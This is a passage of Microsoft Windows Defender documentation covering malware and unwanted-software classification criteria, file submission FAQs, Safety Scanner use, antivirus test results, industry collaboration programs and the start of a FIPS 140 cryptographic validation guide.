Microsoft classifies most malicious software into one of the following categories:
Backdoor: A type of malware that gives malicious hackers remote access to and control of your PC.
Downloader: A type of malware that downloads other malware onto your PC. It needs to connect to the
internet to download files.
Dropper: A type of malware that installs other malware files onto your PC.Unlike a downloader, a dropper
doesn’t need to connect to the internet to drop malicious files. The dropped files are typically embedded in
the dropper itself.
Exploit: A piece of code that uses software vulnerabilities to gain access to your PC and perform other
tasks, such as installing malware. See more information about exploits.
Hacktool: A type of tool that can be used to gain unauthorized access to your PC.
Macro virus: A type of malware that spreads through infected documents, such as Microsoft Word or Excel
documents. The virus is run when you open an infected document.
Obfuscator: A type of malware that hides its code and purpose, making it more difficult for security
software to detect or remove.
Password stealer: A type of malware that gathers your personal information, such as user names and
passwords. It often works along with a keylogger, which collects and sends information about the keys you
press and websites you visit.
Ransomware: A type of malware that encrypts your files or makes other modifications that can prevent
you from using your PC. It then displays a ransom note stating you must pay money, complete surveys, or
perform other actions before you can use your PC again. See more information about ransomware.
Rogue security software: Malware that pretends to be security software but doesn't provide any
protection. This type of malware usually displays alerts about nonexistent threats on your PC. It also tries to
convince you to pay for its services.
Trojan: A type of malware that attempts to appear harmless. Unlike a virus or a worm, a trojan doesn't
spread by itself. Instead it tries to look legitimate, tricking users into downloading and installing it. Once
installed, trojans perform a variety of malicious activities, such as stealing personal information,
downloading other malware, or giving attackers access to your PC.
Trojan clicker: A type of trojan that automatically clicks buttons or similar controls on websites or
applications. Attackers can use this trojan to click on online advertisements. These clicks can skew online
polls or other tracking systems and can even install applications on your PC.
Worm: A type of malware that spreads to other PCs. Worms can spread through email, instant messaging,
file sharing platforms, social networks, network shares, and removable drives. Sophisticated worms take
advantage of software vulnerabilities to propagate.
Unwanted software
Microsoft believes that you should have control over your Windows experience. Software running on Windows
should keep you in control of your PC through informed choices and accessible controls. Microsoft identifies
software behaviors that ensure you stay in control. We classify software that does not fully demonstrate these
behaviors as "unwanted software".
Lack of choice
You must be notified about what is happening on your PC, including what software does and whether it is active.
Software that exhibits lack of choice might:
Fail to provide prominent notice about the behavior of the software and its purpose and intent.
Fail to clearly indicate when the software is active and might also attempt to hide or disguise its presence.
Install, reinstall, or remove software without your permission, interaction, or consent.
Install other software without a clear indication of its relationship to the primary software.
Circumvent user consent dialogs from the browser or operating system.
Falsely claim to be software from Microsoft.
Software must not mislead or coerce you into making decisions about your PC. This is considered behavior that
limits your choices. In addition to the previous list, software that exhibits lack of choice might:
Display exaggerated claims about your PC’s health.
Make misleading or inaccurate claims about files, registry entries, or other items on your PC.
Display claims in an alarming manner about your PC's health and require payment or certain actions in
exchange for fixing the purported issues.
Software that stores or transmits your activities or data must:
Give you notice and get consent to do so. Software should not include an option that configures it to hide
activities associated with storing or transmitting your data.
Lack of control
You must be able to control software on your computer. You must be able to start, stop, or otherwise revoke
authorization to software.
Software that exhibits lack of control might:
Prevent or limit you from viewing or modifying browser features or settings.
Open browser windows without authorization.
Redirect web traffic without giving notice and getting consent.
Modify or manipulate webpage content without your consent.
Software that changes your browsing experience must only use the browser's supported extensibility model for
installation, execution, disabling, or removal. Browsers that do not provide supported extensibility models will be
considered non-extensible and should not be modified.
Installation and removal
You must be able to start, stop, or otherwise revoke authorization given to software. Software should obtain your
consent before installing, and it must provide a clear and straightforward way for you to install, uninstall, or
disable it.
Software that delivers poor installation experience might bundle or download other "unwanted software" as
classified by Microsoft.
Software that delivers poor removal experience might:
Present confusing or misleading prompts or pop-ups while being uninstalled.
Fail to use standard install/uninstall features, such as Add/Remove Programs.
Advertising and advertisements
Software that promotes a product or service outside of the software itself can interfere with your computing
experience. You should have clear choice and control when installing software that presents advertisements.
The advertisements that are presented by software must:
Include an obvious way for users to close the advertisement. The act of closing the advertisement must not
open another advertisement.
Include the name of the software that presented the advertisement.
The software that presents these advertisements must:
Provide a standard uninstall method for the software using the same name as shown in the advertisement it
presents.
Advertisements shown to you must:
Be distinguishable from website content.
Not mislead, deceive, or confuse.
Not contain malicious code.
Not invoke a file download.
Consumer opinion
Microsoft maintains a worldwide network of analysts and intelligence systems where you can submit software for
analysis. Your participation helps us identify new malware quickly. After analysis, Microsoft creates Security
intelligence for software that meets the described criteria. This Security intelligence identifies the software as
malware and are available to all users through Windows Defender Antivirus and other Microsoft antimalware
solutions.
Potentially unwanted application (PUA)
Our PUA protection aims to safeguard user productivity and ensure enjoyable Windows experiences. This optional
protection, available to enterprises, helps deliver more productive, performant, and delightful Windows
experiences.
PUAs are not considered malware.
Microsoft uses specific categories and the category definitions to classify software as a PUA.
Advertising software: Software that displays advertisements or promotions, or prompts the user to
complete surveys for other products or services in software other than itself. This includes software that
inserts advertisements to webpages.
Torrent software: Software that is used to create or download torrents or other files specifically used with
peer-to-peer file-sharing technologies.
Cryptomining software: Software that uses your computer resources to mine cryptocurrencies.
Bundling software: Software that offers to install other software that is not digitally signed by the same
entity. Also, software that offers to install other software that qualify as PUA based on the criteria outlined in
this document.
Marketing software: Software that monitors and transmits the activities of the user to applications or
services other than itself for marketing research.
Evasion software: Software that actively tries to evade detection by security products, including software
that behaves differently in the presence of security products.
Poor industry reputation: Software that trusted security providers detect with their security products. The
security industry is dedicated to protecting customers and improving their experiences. Microsoft and other
organizations in the security industry continuously exchange knowledge about files we have analyzed to
provide users with the best possible protection.
If you have a file that you suspect might be malware or is being incorrectly detected, you can submit it to us for
analysis. This page has answers to some common questions about submitting a file for analysis.
How do I send a malware file to Microsoft?

You can send us files that you think might be malware or files that have been incorrectly detected through the
sample submission portal.
We receive a large number of samples from many sources. Our analysis is prioritized by the number of file
detections and the type of submission. You can help us complete a quick analysis by providing detailed information
about the product you were using and what you were doing when you found the file.
If you sign in before you submit a sample, you will be able to track your submissions.
Can I send a sample by email?

No, we only accept submissions through our sample submission portal.
Can I submit a sample without signing in?

Yes, you many submit a file as an anonymous home customer. You will get a link to a webpage where you can view
the status of the submission.
If you're an enterprise customer, you need to sign in so that we can prioritize your submission appropriately. If you
are currently experiencing a virus outbreak or security-related incident, you should contact your designated
Microsoft support professional or go to Microsoft Support for immediate assistance.
What is the Software Assurance ID (SAID)?

The Software Assurance ID (SAID ) is for enterprise customers to track support entitlements. The submission
portal accepts and retains SAID information and allows customers with valid SAIDs to make higher priority
submissions.
How do I dispute the detection of my program?
Submit the file in question as a software developer. Wait until your submission has a final determination.
If you’re not satisfied with our determination of the submission, use the developer contact form provided with the
submission results to reach Microsoft. We will use the information you provide to investigate further if necessary.
We encourage all software vendors and developers to read about how Microsoft identifies malware and unwanted
software.
How do I track or view past sample submissions?

You can track your submissions through the submission history page. Your submission will only appear on this
page if you were signed in when you submitted it.
If you’re not signed in when you submit a sample, you will be redirected to a tracking page. Bookmark this page if
you want to come back and check on the status of your submission.
What does the submission status mean?
Each submission is shown to be in one of the following status types:
Submitted—the file has been received
In progress—an analyst has started checking the file
Closed—a final determination has been given by an analyst
If you are signed in, you can see the status of any files you submit to us on the submission history page.
How does Microsoft prioritize submissions

Processing submissions take dedicated analyst resource. Because we regularly receive a large number of
submissions, we handle them based on a priority. The following factors affect how we prioritize submissions:
Prevalent files with the potential to impact large numbers of computers are prioritized.
Authenticated customers, especially enterprise customers with valid Software Assurance IDs (SAIDs), are
given priority.
Submissions flagged as high priority by SAID holders are given immediate attention.
Your submission is immediately scanned by our systems to give you the latest determination even before an
analyst starts handling your case. Note that the same file may have already been processed by an analyst. To check
for updates to the determination, select rescan on the submission details page.
Microsoft Safety Scanner
Microsoft Safety Scanner is a scan tool designed to find and remove malware from Windows computers. Simply
download it and run a scan to find malware and try to reverse changes made by identified threats.
Download Microsoft Safety Scanner (32-bit)
Download Microsoft Safety Scanner (64-bit)
Safety Scanner only scans when manually triggered and is available for use 10 days after being downloaded. We
recommend that you always download the latest version of this tool before each scan.
NOTE: This tool does not replace your antimalware product. For real-time protection with automatic updates,
use Windows Defender Antivirus on Windows 10 and Windows 8 or Microsoft Security Essentials on
Windows 7. These antimalware products also provide powerful malware removal capabilities. If you are
having difficulties removing malware with these products, you can refer to our help on removing difficult
threats.
NOTE: Safety scanner is a portable executable and does not appear in the Windows Start menu or as an icon
on the desktop. Note where you saved this download.
System requirements
Safety Scanner helps remove malicious software from computers running Windows 10, Windows 10 Tech
Preview, Windows 8.1, Windows 8, Windows 7, Windows Server 2016, Windows Server Tech Preview, Windows
Server 2012 R2, Windows Server 2012, Windows Server 2008 R2, or Windows Server 2008. Please refer to the
Microsoft Lifecycle Policy.
How to run a scan

1. Download this tool and open it.
2. Select the type of scan you want run and start the scan.
3. Review the scan results displayed on screen. For detailed detection results, view the log at
%SYSTEMROOT%\debug\msert.log.
To remove this tool, delete the executable file (msert.exe by default).
For more information about the Safety Scanner, see the support article on how to troubleshoot problems using
Safety Scanner.
Related resources
Troubleshooting Safety Scanner
Microsoft Security Essentials
Removing difficult threats
Submit file for malware analysis
Microsoft antimalware and threat protection solutions
Top scoring in industry tests
Windows Defender Advanced Threat Protection (Windows Defender ATP ) technologies consistently achieve high
scores in independent tests, demonstrating the strength of its enterprise threat protection capabilities. Microsoft
aims to be transparent about these test scores. This page summarizes the results and provides analysis.
Endpoint detection & response

Windows Defender ATP endpoint detection and response capabilities provide advanced attack detections that are
near real-time and actionable. Security analysts can prioritize alerts effectively, gain visibility into the full scope of a
breach, and take response actions to remediate threats.
MITRE: Industry-leading optics and detection capabilities
MITRE tested the ability of products to detect techniques commonly used by the targeted attack group APT3 (also
known as Boron or UPS ). To isolate detection capabilities, all protection and prevention features were turned off.
Microsoft is happy to be one of the first EDR vendors to sign up for the MITRE evaluation based on the ATT&CK
framework, widely regarded today as the most comprehensive catalog of attacker techniques and tactics.
ATT&CK-based evaluation: Leading optics and detection capabilities | Analysis
Windows Defender ATP delivered comprehensive coverage of attacker techniques across the entire attack
chain. Highlights included the breadth of telemetry, the strength of threat intelligence, and the advanced,
automatic detection through machine learning, heuristics, and behavior monitoring.

Windows Defender Antivirus consistently performs highly in independent tests, displaying how it is a top choice in
the antivirus market. Note that these tests only provide results for antivirus and do not test for additional security
protections.
Windows Defender Antivirus is part of the next generation Window Defender ATP security stack which addresses
the latest and most sophisticated threats today. In some cases, customers might not even know they were protected
because a cyberattack is stopped milliseconds after a campaign starts. That's because Windows Defender Antivirus
detects and stops malware at first sight by using machine learning, artificial intelligence, behavioral analysis, and
other advanced technologies.
AV -TEST: Protection score of 6.0/6.0 in the latest test
The AV -TEST Product Review and Certification Report tests on three categories: protection, performance, and
usability. The scores listed below are for the Protection category which has two scores: Real-World Testing and the
AV -TEST reference set (known as "Prevalent Malware").
January - February 2019 AV -TEST Business User test: Protection score 6.0/6.0 Latest
Windows Defender Antivirus achieved an overall Protection score of 6.0/6.0, with 19,956 malware samples
used. This is the fifth consecutive cycle that Windows Defender Antivirus achieved a perfect score.
November - December 2018 AV -TEST Business User test: Protection score 6.0/6.0 | Analysis
Windows Defender Antivirus achieved an overall Protection score of 6.0/6.0, detecting 100% of 19,956
malware samples.
September - October 2018 AV -TEST Business User test: Protection score 6.0/6.0 | Analysis
Windows Defender Antivirus achieved an overall Protection score of 6.0/6.0, protecting against 21,566 of
21,568 tested malware samples.
July - August 2018 AV -TEST Business User test: Protection score 6.0/6.0 | Analysis
malware samples.
May - June 2018 AV -TEST Business User test: Protection score 6.0/6.0 | Analysis
malware samples.
March - April 2018 AV -TEST Business User test: Protection score 5.5/6.0 | Analysis
Windows Defender Antivirus achieved an overall Protection score of 5.5/6.0, missing 2 out of 5,680
malware samples (0.035% miss rate).
January - February 2018 AV -TEST Business User test: Protection score 6.0/6.0 | Analysis
Windows Defender Antivirus achieved an overall Protection score of 6.0/6.0, with 5,105 malware samples
tested.
AV -Comparatives: Protection rating of 99.6% in the latest test

AV -Comparatives is an independent organization offering systematic testing for security software such as PC/Mac-
based antivirus products and mobile security solutions.
Real-World Protection Test Enterprise August - November 2018: Protection Rate 99.6% Latest
This test, as defined by AV -Comparatives, attempts to assess the effectiveness of each security program to
protect a computer against active malware threats while online. The test set contained 1207 test cases (such
as malicious URLs).
Malware Protection Test Enterprise August 2018: Protection Rate 99.9%
This test, as defined by AV -Comparatives, attempts to assesses a security program’s ability to protect a
system against infection by malicious files before, during or after execution. The results are based on testing
against 1,556 malware samples.
Real-World Protection Test Enterprise March - June 2018: Protection Rate 98.7%
The test set contained 1,163 test cases (such as malicious URLs).
Malware Protection Test Enterprise March 2018: Protection Rate 99.9%
For this test, 1,470 recent malware samples were used.
Historical AV -Comparatives Microsoft tests
SE Labs: Total accuracy rating of AAA in the latest test
SE Labs tests a range of solutions used by products and services to detect and/or protect against attacks, including
endpoint software, network appliances, and cloud services.
Enterprise Endpoint Protection October - December 2018: AAA award pdf
Microsoft's next-gen protection was named as one of the leading products, stopping all of the public and
targeted attacks.
Enterprise Endpoint Protection July - September 2018: AAA award pdf
Microsoft's next-gen protection was named as one of the most effective products, stopping all public and
targeted attacks. It showcased its ability to block malicious URLs, deal with exploits, and classify legitimate
apps and websites correctly.
Enterprise Endpoint Protection April - June 2018: AAA award pdf
Microsoft's next-gen protection was named as one of the most effective products, stopping all targeted
attacks and the vast majority of public threats.
To what extent are tests representative of protection in the real world?

It is important to remember that Microsoft sees a wider and broader set of threats beyond what’s tested in the
evaluations highlighted above. For example, in an average month, we identify over 100 million new threats. Even if
an independent tester can acquire and test 1% of those threats, that is a million tests across 20 or 30 products. In
other words, the vastness of the malware landscape makes it extremely difficult to evaluate the quality of protection
against real world threats.
The capabilities within Windows Defender ATP provide additional layers of protection that are not factored into
industry tests, and address some of the latest and most sophisticated threats. Isolating AV from the rest of
Windows Defender ATP creates a partial picture of how our security stack operates in the real world. For example,
attack surface reduction and endpoint detection & response capabilities can help prevent malware from getting
onto devices in the first place. We have proven that Windows Defender ATP components catch samples that
Windows Defender Antivirus missed in these industry tests, which is more representative of how effectively our
security suite protects customers in the real world.
Using independent tests, customers can view one aspect of their security suite but can't assess the complete
protection of all the security features. Microsoft is highly engaged in working with several independent testers to
evolve security testing to focus on the end-to-end security stack. In the meantime, customers can evaluate
Windows Defender Advanced Threat Protection in their own networks by signing up for a 90-day trial of Windows
Defender ATP, or enabling Preview features on existing tenants.
Industry collaboration programs
Microsoft has several industry-wide collaboration programs with different objectives and requirements. Enrolling
in the right program can help you protect your customers, gain more insight into the current threat landscape, or
assist in disrupting the malware ecosystem.
Virus Information Alliance (VIA)

The VIA program gives members access to information that will help improve protection for Microsoft customers.
Malware telemetry and samples can be provided to security teams to help identify gaps in their protection,
prioritize new threat coverage, or better respond to threats.
You must be a member of VIA if you want to apply for membership to the other programs.
Go to the VIA program page for more information.
Microsoft Virus Initiative (MVI)

MVI is open to organizations who build and own a Real Time Protection (RTP ) antimalware product of their own
design, or one developed using a third-party antivirus SDK.
Members get access to Microsoft client APIs for the Windows Defender Security Center, IOAV, AMSI, and Cloud
Files, along with health data and other telemetry to help their customers stay protected. Antimalware products are
submitted to Microsoft for performance testing on a regular basis.
Go to the MVI program page for more information.
Coordinated Malware Eradication (CME)

CME is open to organizations who are involved in cybersecurity and antimalware or interested in fighting
cybercrime.
The program aims to bring organizations in cybersecurity and other industries together to pool tools, information
and actions to drive coordinated campaigns against malware. The ultimate goal is to create efficient and long-
lasting results for better protection of our collective communities, customers, and businesses.
Go to the CME program page for more information.
Virus Information Alliance
The Virus Information Alliance (VIA) is a public antimalware collaboration program for security software
providers, security service providers, antimalware testing organizations, and other organizations involved in
fighting cybercrime.
Members of the VIA program collaborate by exchanging technical information on malicious software with
Microsoft, with the goal of improving protection for Microsoft customers.
Better protection for customers against malware

The VIA program gives members access to information that will help improve protection for Microsoft customers.
For example, the program provides malware telemetry and samples to security product teams to identify gaps in
their protection and prioritize new threat coverage.
Malware prevalence data is provided to antimalware testers to assist them in selecting sample sets and setting
scoring criteria that represent the real-world threat landscape. Service organizations, such as a CERT, can leverage
our data to help assess the impact of policy changes or to help shut down malicious activity.
Microsoft is committed to continuous improvement to help reduce the impact of malware on customers. By
sharing malware-related information, Microsoft enables members of this community to work towards better
protection for customers.
Becoming a member of VIA

Microsoft has well-defined, objective, measurable, and tailored membership criteria for prospective members of
the Virus Information Alliance (VIA). The criteria is designed to ensure that Microsoft is able to work with security
software providers, security service providers, antimalware testing organizations, and other organizations involved
in the fight against cybercrime to protect a broad range of customers.
Members will receive information to facilitate effective malware detection, deterrence, and eradication. This
includes technical information on malware as well as metadata on malicious activity. Information shared through
VIA is governed by the VIA membership agreement and a Microsoft non-disclosure agreement, where applicable.
VIA has an open enrollment for potential members.
Initial selection criteria
To be eligible for VIA your organization must:
1. Be willing to sign a non-disclosure agreement with Microsoft.
2. Fit into one of the following categories:
Your organization develops antimalware technology that can run on Windows and your organization’s
product is commercially available.
Your organization provides security services to Microsoft customers or for Microsoft products.
Your organization publishes antimalware testing reports on a regular basis.
Your organization has a research or response team dedicated to fighting malware to protect your
organization, your customers, or the general public.
3. Be willing to sign and adhere to the VIA membership agreement.
If your organization meets these criteria and is interested in joining, apply for membership now. If you have
questions, contact us for more information.
Microsoft Virus Initiative
The Microsoft Virus Initiative (MVI) helps organizations to get their products working and integrated with
Windows.
MVI members will receive access to Windows APIs (such as those used by Windows Defender Antivirus), and
other technologies including IOAV, AMSI and Cloud Files, malware telemetry and samples, and invitations to
security related events and conferences.
MVI requires members to develop and own antimalware technology and to be present in the antimalware industry
community.
Join MVI
A request for membership is made by an individual as a representative of an organization that develops and
produces antimalware or antivirus technology.
Initial selection criteria
Your organization must meet the following eligibility requirements to qualify for the MVI program:
1. Offer an antimalware or antivirus product that is one of the following:
Your organization's own creation.
Developed by using an SDK (engine and other components) from another MVI Partner company and
your organization adds a custom UI and/or other functionality.
2. Have your own malware research team unless you build a product based on an SDK.
3. Be active and have a positive reputation in the antimalware industry. Your organization is:
Certified through independent testing by an industry standard organization such as ICSA Labs, West
Coast Labs, PCSL IT Consulting Institute, or SKD Labs.
Be active in the antimalware industry. For example, participate in industry conferences, be reviewed in an
industry standard report such as AV Comparatives, OPSWAT or Gartner.
4. Be willing to sign a non-disclosure agreement (NDA) with Microsoft.
5. Be willing to sign a program license agreement.
6. Be willing to adhere to program requirements for antimalware apps. These requirements define the
behavior of antimalware apps necessary to ensure proper interaction with Windows.
7. Submit your app to Microsoft for periodic performance testing.
Apply now
Coordinated Malware Eradication
Coordinated Malware Eradication (CME ) aims to bring organizations in cybersecurity and in other industries
together to change the game against malware. While the cybersecurity industry today is effective at disrupting
malware families through individual efforts, those disruptions rarely lead to eradication since malware authors
quickly adapt their tactics to survive.
CME calls for organizations to pool their tools, information and actions to drive coordinated campaigns against
malware. The ultimate goal is to drive efficient and long lasting results for better protection of our collective
communities, customers, and businesses.
Combining our tools, information, and actions

Diversity of participation across industries and disciplines, extending beyond cybersecurity, makes eradication
campaigns even stronger across the malware lifecycle. For instance, while security vendors, computer emergency
response/readiness teams (CERTs), and Internet service providers (ISPs) can contribute with malware telemetry,
online businesses can identify fraudulent behavior and law enforcement agencies can drive legal action.
In addition to telemetry and analysis data, Microsoft is planning to contribute cloud-based scalable storage and
computing horsepower with the necessary big data analysis tools built-in to these campaigns.
Coordinated campaigns for lasting results

Organizations participating in the CME effort work together to help eradicate selected malware families by
contributing their own telemetry data, expertise, tools, and other resources. These organizations operate under a
campaign umbrella with clearly defined end goals and metrics. Any organization or member can initiate a
campaign and invite others to join it. The members then have the option to accept or decline the invitations they
receive.
Join the effort

Any organization that is involved in cybersecurity and antimalware or interested in fighting cybercrime can
participate in CME campaigns by enrolling in the Virus Information Alliance (VIA) program. It ensures that
everyone agrees to use the information and tools available for campaigns for their intended purpose (that is, the
eradication of malware).
Information for developers
Learn about the common questions we receive from software developers and get other developer resources such
as detection criteria and file submissions.
In this section
TOPIC DESCRIPTION
Software developer FAQ Provides answers to common questions we receive from

software developers.
Developer resources Provides information about how to submit files, detection

criteria, and how to check your software against the latest
Security intelligence and cloud protection from Microsoft.
Software developer FAQ
This page provides answers to common questions we receive from software developers. For general guidance
about submitting malware or incorrectly detected files, read the submission guide.
Does Microsoft accept files for a known list or false-positive prevention

program?
No. We do not accept these requests from software developers. Signing your program's files in a consistent
manner, with a digital certificate issued by a trusted root authority, helps our research team quickly identify the
source of a program and apply previously gained knowledge. In some cases, this might result in your program
being quickly added to the known list or, far less frequently, in adding your digital certificate to a list of trusted
publishers.
How do I dispute the detection of my program?

Submit the file in question as a software developer. Wait until your submission has a final determination.
If you're not satisfied with our determination of the submission, use the developer contact form provided with the
submission results to reach Microsoft. We will use the information you provide to investigate further if necessary.
We encourage all software vendors and developers to read about how Microsoft identifies malware and unwanted
software.
Why is Microsoft asking for a copy of my program?

This can help us with our analysis. Participants of the Microsoft Active Protection Service (MAPS ) may
occasionally receive these requests. The requests will stop once our systems have received and processed the file.
Why does Microsoft classify my installer as a software bundler?

It contains instructions to offer a program classified as unwanted software. You can review the criteria we use to
check applications for behaviors that are considered unwanted.
Why is the Windows Firewall blocking my program?

This is not related to Windows Defender Antivirus and other Microsoft antimalware. You can find out more about
Windows Firewall from the Microsoft Developer Network.
Why does the Windows Defender SmartScreen say my program is not

commonly downloaded?
This is not related to Windows Defender Antivirus and other Microsoft antimalware. You can find out more from
the SmartScreen website.
Software developer resources
Concerned about the detection of your software? If you believe that your application or program has been
incorrectly detected by Microsoft security software, submit the relevant files for analysis.
Check out the following resources for information on how to submit and view submissions:
Submit files
View your submissions
Additional resources
Detection criteria
To objectively identify malware and unidentified software, Microsoft applies a set of criteria for evaluating
malicious or potentially harmful code.
Developer questions
Find more guidance about the file submission and detection dispute process in our FAQ for software developers.
Scan your software
Use Windows Defender Antivirus to check your software against the latest Security intelligence and cloud
protection from Microsoft.
FIPS 140 Validation
On this page
Introduction
FIPS 140 Overview
Microsoft Product Validation (Information for Procurement Officers and Auditors)
Information for System Integrators
Information for Software Developers
FIPS 140 FAQ
Microsoft FIPS 140 Validated Cryptographic Modules
Cryptographic Algorithms
Updated: March 2018
Introduction
This document provides information on how Microsoft products and cryptographic modules comply with the U.S.
Federal government standard, Federal Information Processing Standard (FIPS ) 140 – Security Requirements for
Cryptographic Modules [FIPS 140].
Audience
This document is primarily focused on providing information for three parties:
Procurement Officer – Responsible for verifying that Microsoft products (or even third-party applications) are
either FIPS 140 validated or utilize a Microsoft FIPS 140 validated cryptographic module.
System Integrator – Responsible for ensuring that Microsoft Products are configured properly to use only FIPS
140 validated cryptographic modules.
Software Developer – Responsible for building software products that utilize Microsoft FIPS 140 validated
cryptographic modules.
Document Map
This document is broken into seven major sections:
FIPS 140 Overview – Provides an overview of the FIPS 140 standard as well as provides some historical
information about the standard.
Microsoft Product Validation (Information for Procurement Officers and Auditors) – Provides information on how
Microsoft products are FIPS 140 validated.
Information for System Integrators – Describes how to configure and verify that Microsoft Products are being used
in a manner consistent with the product’s FIPS 140 Security Policy.
Information for Software Developers – Identifies how developers can leverage the Microsoft FIPS 140 validated
FAQ – Frequently Asked Questions.
Microsoft FIPS 140 Validated Cryptographic Modules – Explains Microsoft cryptographic architecture and
identifies specific modules that are FIPS 140 validated.
Cryptographic Algorithms – Lists the cryptographic algorithm, modes, states, key sizes, Windows versions, and
corresponding cryptographic algorithm validation certificates.
FIPS 140 Overview

FIPS 140 Standard
FIPS 140 is a US government and Canadian government standard that defines a minimum set of the security
requirements for products that implement cryptography. This standard is designed for cryptographic modules that
are used to secure sensitive but unclassified information. Testing against the FIPS 140 standard is maintained by
the Cryptographic Module Validation Program (CMVP ), a joint effort between the US National Institute of
Standards and Technology (NIST) and the Communications Security Establishment of Canada (CSEC ).
The current standard defines four-levels of increasing security, 1 through 4. Most software products (including all
Microsoft products) are tested against the Level 1 security requirements.
Applicability of the FIPS standard
Within the US Federal government, the FIPS 140 standard applies to any security system (whether hardware,
firmware, software, or a combination thereof) to be used by agencies for protecting sensitive but unclassified
information. Some agencies have expanded its use by requiring that the modules to be procured for secret systems
also meet the FIPS 140 requirements.
The FIPS 140 standard has also been used by different standards bodies, specification groups, nations, and private
institutions as a requirement or guideline for those products (e.g. – Digital Cinema Systems Specification).
History of 140-1
FIPS 140-1 is the original working version of the standard made official on January 11, 1994. The standard
remained in effect until FIPS 140-2 became mandatory for new products on May 25, 2002.
FIPS 140-2
FIPS 140-2 is currently the active version of the standard.
Microsoft FIPS Support Policy
Microsoft actively maintains FIPS 140 validation for its cryptographic modules.
FIPS Mode of Operation
The common term “FIPS mode” is used in this document and Security Policy documents. When a cryptographic
module contains both FIPS -approved and non-FIPS approved security methods, it must have a "FIPS mode of
operation" to ensure only FIPS -approved security methods may be used. When a module is in "FIPS mode", a non-
FIPS approved method cannot be used instead of a FIPS -approved method.
Microsoft Product Validation (Information for Procurement Officers and

Auditors)
This section provides information for Procurement Officers and Auditors who are responsible for ensuring that
Microsoft products with FIPS 140 validated cryptographic modules are used in their organization. The goal of this
section is to provide an overview of the Microsoft developed products and modules and explain how the validated
cryptographic modules are used.
Microsoft Product Relationship with CNG and CAPI libraries
Rather than validate individual components and products, Microsoft chooses to validate only the underlying
cryptographic modules. Subsequently, many Windows components and Microsoft products are built to rely on the
Cryptographic API: Next Generation (CNG ) and legacy Cryptographic API (CAPI) FIPS 140 validated
cryptographic modules. Windows components and Microsoft products use the documented application
programming interfaces (APIs) for each of the modules to access various cryptographic services.
The following list contains some of the Windows components and Microsoft products that rely on FIPS 140
validated cryptographic modules:
Schannel Security Package
Remote Desktop Protocol (RDP ) Client
Encrypting File System (EFS )
Some Microsoft .NET Framework Applications (.NET also provides cryptographic algorithm implementations
that have not been FIPS 140 validated.)
BitLocker® Drive Full-volume Encryption
IPsec Settings of Windows Firewall
Information for System Integrators

This section provides information for System Integrators and Auditors who are responsible for deploying
Microsoft products in a manner consistent with the product’s FIPS 140 Security Policy.
There are two steps to ensure that Microsoft products operate in FIPS mode:
1. Selecting/Installing FIPS 140 validated cryptographic modules
2. Setting FIPS local/group security policy flag.
Step 1 – Selecting/Installing FIPS 140 Validated Cryptographic Modules
Systems Integrators must ensure that all cryptographic modules installed are, in fact, FIPS 140 validated. This can
be accomplished by cross-checking the version number of the installed module with the list of validated binaries.
The list of validated CAPI binaries is identified in the CAPI Validated Cryptographic Modules section below and the
list of validated CNG binaries is identified in the CNG Validated Cryptographic Modules section below. There are
similar sections for all other validated cryptographic modules.
The version number of the installed binary is found by right-clicking the module file and clicking on the Version or
Details tab. Cryptographic modules are stored in the "windows\system32" or "windows\system32\drivers"
directory.
Step 2 – Setting FIPS Local/Group Security Policy Flag
The Windows operating system provides a group (or local) security policy setting, “System cryptography: Use FIPS
compliant algorithms for encryption, hashing, and signing”, which is used by many Microsoft products to
determine whether to operate in a FIPS -approved mode. When this policy is set, the validated cryptographic
modules in Windows will also operate in a FIPS -approved mode.
Note – There is no enforcement of the FIPS policy by the operating system or the validated cryptographic
modules. Instead, each individual application must check this flag and enforce the Security Policy of the validated
Instructions on Setting the FIPS Local/Group Security Policy Flag
While there are alternative methods for setting the FIPS local/group security policy flag, the following method is
included as a guide to users with Administrative privileges. This description is for the Local Security Policy, but the
Group Security Policy may be set in a similar manner.
1. Open the 'Run' menu by pressing the combination 'Windows Key + R'.
2. Type 'secpol.msc' and press 'Enter' or click the 'Ok' button.
3. In the Local Security Policy management console window that opens, use the left tab to navigate to the Local
Policies -> Security Options.
4. Scroll down the right pane and double-click 'System cryptography: Use FIPS compliant algorithms for
encryption, hashing, and signing'.
5. In the properties window, select the 'Enabled' option and click the 'Apply' button.
Microsoft Components and Products That Utilize FIPS Local/Group Security Policy
The following list details some of the Microsoft components that use the cryptographic functionality implemented
by either CNG or legacy CAPI. When the FIPS Local/Group Security Policy is set, the following components will
enforce the validated module Security Policy.
Schannel Security Package
Remote Desktop Protocol (RDP ) Client
Encrypting File System (EFS )
Some Microsoft .NET Framework Applications (.NET also provides cryptographic algorithm implementations
that have not been FIPS 140 validated.)
BitLocker® Drive Full-volume Encryption
IPsec Settings of Windows Firewall
Effects of Setting FIPS Local/Group Security Policy Flag
When setting the FIPS local/group security policy flag, the behavior of several Microsoft components and products
are affected. The most noticeable difference will be that the components enforcing this setting will only use those
algorithms approved or allowed in FIPS mode. The specific changes to the products listed above are:
Schannel Security Package forced to negotiate sessions using TLS. The following supported Cipher Suites
are disabled:
TLS_RSA_WITH_RC4_128_SHA
TLS_RSA_WITH_RC4_128_MD5
SSL_CK_RC4_128_WITH_MD5
SSL_CK_DES_192_EDE3_CBC_WITH_MD5
TLS_RSA_WITH_NULL_MD5
TLS_RSA_WITH_NULL_SHA
The set of cryptographic algorithms that a Remote Desktop Protocol (RDP ) server will use is scoped to:
CALG_RSA_KEYX - RSA public key exchange algorithm
CALG_3DES - Triple DES encryption algorithm
CALG_AES_128 - 128 bit AES
CALG_AES_256 - 256 bit AES
CALG_SHA1 - SHA hashing algorithm
CALG_SHA_256 - 256 bit SHA hashing algorithm
Any Microsoft .NET Framework applications, such as Microsoft ASP.NET or Windows Communication
Foundation (WCF ), only allow algorithm implementations that are validated to FIPS 140, meaning only
classes that end in "CryptoServiceProvider" or "Cng" can be used. Any attempt to create an instance of other
cryptographic algorithm classes or create instances that use non-allowed algorithms will cause an
InvalidOperationException exception.
Verification of ClickOnce applications fails unless the client computer has .NET Framework 2.0 SP1 or later
service pack installed or .NET Framework 3.5 or later installed.
On Windows Vista and Windows Server 2008 and later, BitLocker Drive Encryption switches from AES -128
using the elephant diffuser to using the approved AES -256 encryption. Recovery passwords are not created
or backed up. Instead, backup a recovery key on a local drive or on a network share. To use the recovery key,
put the key on a USB device and plug the device into the computer.
Please be aware that selection of FIPS mode can limit product functionality (See
http://support.microsoft.com/kb/811833).
Information for Software Developers
This section is targeted at developers who wish to build their own applications using the FIPS 140 validated
Each of the validated cryptographic modules defines a series of rules that must be followed. The security rules for
